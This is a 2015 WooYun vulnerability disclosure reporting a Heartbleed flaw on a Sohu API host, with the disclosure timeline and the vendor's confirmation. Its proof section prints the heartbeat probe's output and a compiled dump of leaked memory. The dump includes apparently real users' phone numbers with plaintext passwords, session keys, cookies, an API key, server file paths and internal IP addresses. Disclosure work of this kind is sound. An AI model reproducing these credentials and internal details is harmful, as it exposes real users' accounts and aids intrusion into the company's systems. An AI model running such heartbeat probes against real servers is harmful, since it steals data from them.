当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125620

漏洞标题:搜狐某站心脏滴血漏洞泄露敏感信息

相关厂商:搜狐

漏洞作者: 路人甲

提交时间:2015-07-09 14:30

修复时间:2015-08-23 14:54

公开时间:2015-08-23 14:54

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

123.125.123.130	
api.wan.sohu.com

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3364
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
Host: api.wan.sohu.com..Connection: Keep-Alive..Accept-Encoding: gzip..Content-Length: 133....app_id=1003&captcha=5602&nick_name=%25E5%25A4%25A7%25E5%2585%2589%25E6%25A3%258D&password=yt990503&phone_number=15879013943&psid=772&.h...D.....M#. MTV_SRC=1001%7C0001; SUV=1434039599455980; _channeled=1212130001; _smuid=0GMlZgBkUdkXMZAV0OoJP5; _trans_=000012_qq_hp; adaptor_version=3; curAreaFlag=310000; hide_ad=0; page_version=3; position=9; vjlast=1425428358.1426202859.11; vjuids=1b1695acd.14be226a4e6.0.1ddb593c....c5NCwmbjc5NCwmaSc5NCwmdyc5NCwmaCc5NCwmYyc5NCwmZSc5NCwmbSc5NCwmdCc5NH0; SUV=1433391828780841; utsf_shop_joke=s_00007; vjlast=1429887881.1429887881.30; vjuids=-a54cb6c35.14cebf58eec.0.eed5da3c; CMAP=1;..Cache-Control. max-age=0...., bntpl, txxnhf, hvzajzau, tkdfkn, txxnhftu, zajzau, txvckgxv, unptxx, ftuhv, epcvganp, trkarh, pphetr, dtdyazja ,hutf..User-Agent. Mozilla/4.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11)....0703/n416150345.shtml#211^%u7B2C%u5341%u4E8C%u671F%u5168%u7A0B^1435977483055^^5747.180000000001^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1690147.jpg%2C407272302^2347911^0^6302^254211^http://tv.sohu.com/20150428/n412012561.shtml?txid=1946be12ca182ba8107a42119010c9b0#6302^%u6709%u79CD%u4F60%u7231%u6211^1436079573069^^6389.480000000002^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1627448.jpg%2C406695129^2453420^0^2666^279^http://tv.sohu.com/20150707/n416343014.shtml#2666^%u504F%u504F%u559C%u6B22%u4F60%u7B2C38%u96C6^1436333505601^http://tv.sohu.com/20150708/n416343489.shtml^2666.613^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1693746.jpg%2C406695131^2453518^0^149^5^http://tv.sohu.com/20150708/n416343489.shtml#149^%u504F%u504F%u559C%u6B22%u4F60%u7B2C39%u96C6%u9884%u544A%u7247^1436333784769^http://tv.sohu.com/20150707/n416275341.shtml^170.06294784580498^http://bd4944a8.vrs.imgcdn.sohucs.com/img/o_zoom,w_170,h_110/video_hor_1693816.jpg; isJump=0; dm_input_tips=true; fuid=14301274667259372212; interaction=8354341:1436332039835
整理了部分信息:
api_key=9854b2afa779e1a6bff1962447a09dbd
/opt/nginx/logs/api.tv.sohu.com.log.error_log
/opt/nginx/logs/pay.wan.sohu.com.log
/opt/nginx/conf/pay.wan.sohu.com.pem
x-huawei-NASIP. 10.58.0.1
x-huawei-sgsnip. 116.79.217.64
10.10.22.122:8106
10.10.76.163:8106
10.10.22.116:8106.server..10.16.48.28:8106
10.16.48.38:8106
10.10.76.163:810
10.16.48.28:8106
10.16.48.109:8106
10.10.10.76/opt/nginx/proxy_temp
server..10.16.48.56:8080..10.16.48.56:8080.08..10.16.48.56:8080.server..10.10.22.188:8080..10.10.22.188:8080
Host: api.tv.sohu.com..X-Real-IP: 10.20.102.101..X-Forwarded-For: 113.17.138.17, 113.17.138.17, 10.20.102.101
Host. api.tv.sohu.com..X-Forwarded-For. 58.209.230.76, 58.209.230.76
Host: tvapi.sohuno.com..X-Real-IP: 10.10.22.187..X-Forwarded-For: 10.10.22.187
app_id=1003&captcha=5602&nick_name=%25E5%25A4%25A7%25E5%2585%2589%25E6%25A3%258D&password=yt990503&phone_number=15879013943&psid=772
app_id=1003&captcha=1013&nick_name=%25E6%25B8%2585%25E9%25A3%258E&password=840717&phone_number=13869052981&psid=772
app_id=1003&captcha_pic=6742&password=123456aaa&phone_number=13698641999&psid=772
nick_name=123456&password=bbbuytemncedd&phone_number=18539772468&psid=772
password=123456&phone_number=15027965990&psid=772
ssword=13598478911&phone_number=13598478911&psid=772
app_id=1003&captcha=0571&phone_number=18805474887&psid=772&session_key=d62c1dfb0dc6f19b04f331de5abd39ee4ca262fdb8d316c9fed8d58c4de8d163&wanuid=682052495
app_id=1003&password=lvbu0019&phone_number=15100323322&psid=772
app_id=1003&captcha=3270&nick_name=zzj412000&password=zzj412000&phone_number=18218534460&psid=772
app_id=1003&captcha=8838&nick_name=%25E5%2593%25A5%25E4%25BB%25AC&password=322506&phone_number=13086660202&psid=772
app_id=1003&psid=772&session_key=f7cd256d689460b8cbfdfc8d7068e10f3ccf75aff9b882b2a18b12ecf26ccacd&wanuid=682051793&one_number=18562636516&psid=772
拿到的账号密码是调用这个接口的,
但是没找到是哪些在调这个接口服务。。。

修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-09 14:53

厂商回复:

感谢支持。

最新状态:

暂无